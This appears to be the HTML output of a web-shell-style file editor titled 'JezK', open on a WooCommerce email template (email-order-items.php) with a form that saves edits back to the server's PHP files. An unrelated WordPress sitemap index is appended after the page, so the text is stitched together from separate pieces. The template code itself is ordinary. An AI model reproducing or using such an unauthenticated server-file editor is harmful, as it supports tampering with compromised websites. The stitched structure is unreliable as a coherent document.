
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: email-order-items.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * Email Order Items (plain)
 *
 * This template can be overridden by copying it to yourtheme/woocommerce/emails/plain/email-order-items.php.
 *
 * HOWEVER, on occasion WooCommerce will need to update template files and you
 * (the theme developer) will need to copy the new files to your theme to
 * maintain compatibility. We try to do this as little as possible, but it does
 * happen. When this occurs the version of the template file will be bumped and
 * the readme will list any important changes.
 *
 * @see         https://woo.com/document/template-structure/
 * @package     WooCommerce\Templates\Emails\Plain
 * @version     5.2.0
 */

if ( ! defined( &#039;ABSPATH&#039; ) ) {
	exit; // Exit if accessed directly.
}

foreach ( $items as $item_id =&gt; $item ) :
	if ( apply_filters( &#039;woocommerce_order_item_visible&#039;, true, $item ) ) {
		$product       = $item-&gt;get_product();
		$sku           = &#039;&#039;;
		$purchase_note = &#039;&#039;;

		if ( is_object( $product ) ) {
			$sku           = $product-&gt;get_sku();
			$purchase_note = $product-&gt;get_purchase_note();
		}

		// phpcs:disable WordPress.Security.EscapeOutput.OutputNotEscaped
		echo wp_kses_post( apply_filters( &#039;woocommerce_order_item_name&#039;, $item-&gt;get_name(), $item, false ) );
		if ( $show_sku &amp;&amp; $sku ) {
			echo &#039; (#&#039; . $sku . &#039;)&#039;;
		}
		echo &#039; X &#039; . apply_filters( &#039;woocommerce_email_order_item_quantity&#039;, $item-&gt;get_quantity(), $item );
		echo &#039; = &#039; . $order-&gt;get_formatted_line_subtotal( $item ) . &quot;\n&quot;;
		// phpcs:enable WordPress.Security.EscapeOutput.OutputNotEscaped

		// allow other plugins to add additional product information here.
		do_action( &#039;woocommerce_order_item_meta_start&#039;, $item_id, $item, $order, $plain_text );
		// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
		echo strip_tags(
			wc_display_item_meta(
				$item,
				array(
					&#039;before&#039;    =&gt; &quot;\n- &quot;,
					&#039;separator&#039; =&gt; &quot;\n- &quot;,
					&#039;after&#039;     =&gt; &#039;&#039;,
					&#039;echo&#039;      =&gt; false,
					&#039;autop&#039;     =&gt; false,
				)
			)
		);

		// allow other plugins to add additional product information here.
		do_action( &#039;woocommerce_order_item_meta_end&#039;, $item_id, $item, $order, $plain_text );
	}
	// Note.
	if ( $show_purchase_note &amp;&amp; $purchase_note ) {
		echo &quot;\n&quot; . do_shortcode( wp_kses_post( $purchase_note ) );
	}
	echo &quot;\n\n&quot;;
endforeach;
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
